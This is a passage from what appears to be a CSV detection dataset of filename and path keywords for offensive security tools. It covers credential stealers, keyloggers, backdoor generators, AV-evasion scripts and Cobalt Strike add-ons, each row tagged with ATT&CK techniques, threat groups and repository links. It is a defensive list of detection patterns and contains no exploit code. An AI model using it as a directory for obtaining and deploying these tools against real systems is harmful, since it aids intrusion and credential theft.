T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*/tftp-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/TGSThief.git*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" +"*/TGSThief/*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" +"*/tgtParse.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*/tgtParse/tgtParse.*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*/thc-hydra/*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols 
to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*/the-backdoor-factory.git*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*/TheFatRat*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8269","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" +"*/theHarvester.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/theHarvester.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/ThemeBleed.exe*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*/thief.py*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*/thirdparty/msf/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/ThisIsNotRat.git*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" +"*/thoth.git*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/ThreadlessInject.git*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*/ThreatCheck.git*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - 
T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*/ThunderDNS*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" +"*/ticketConverter.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*/ticketer.py -*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver 
ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" +"*/ticketer.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*/ticketsplease.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*/TikiLoader/*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*/TikiSpawn.*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*/TikiSpawn/*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*/timeoutpwn64*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/timestomp.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/timestomping.ps1*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/timwr/CVE-2016-5195*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" +"*/tinar.py*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","0","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" +"*/tls-alpn.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/tls-nextprotoneg.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/tls-ticketbleed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/tmmmp *","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/tmp/*-passwords.txt*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" +"*/tmp/*-usernames.txt*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" 
+"*/tmp/.manspider*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*/tmp/amass.zip*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/tmp/bin/csprecon*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/tmp/bin/subfinder*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/tmp/c2-rebind.so*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*/tmp/chimera.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/tmp/dcow 
*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" +"*/tmp/FavFreak/*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/tmp/geckodriver.tar.gz*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/tmp/gitleaks*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/tmp/host.ghost*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" +"*/tmp/mac.ghost*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" +"*/tmp/metadata/na.elf*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 
framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*/tmp/metasploit_install*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/tmp/p0f.log*","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/tmp/payload.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/tmp/scanrepo.tar.gz*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/tmp/truffleHog.tar.gz*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - 
TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/tmp/vt-post-*.txt*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/tmp/vt-results-*.txt*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/tmp/wordlist.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*/tn3270-screen.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/TokenStealing*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*/TokenStripBOF*","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 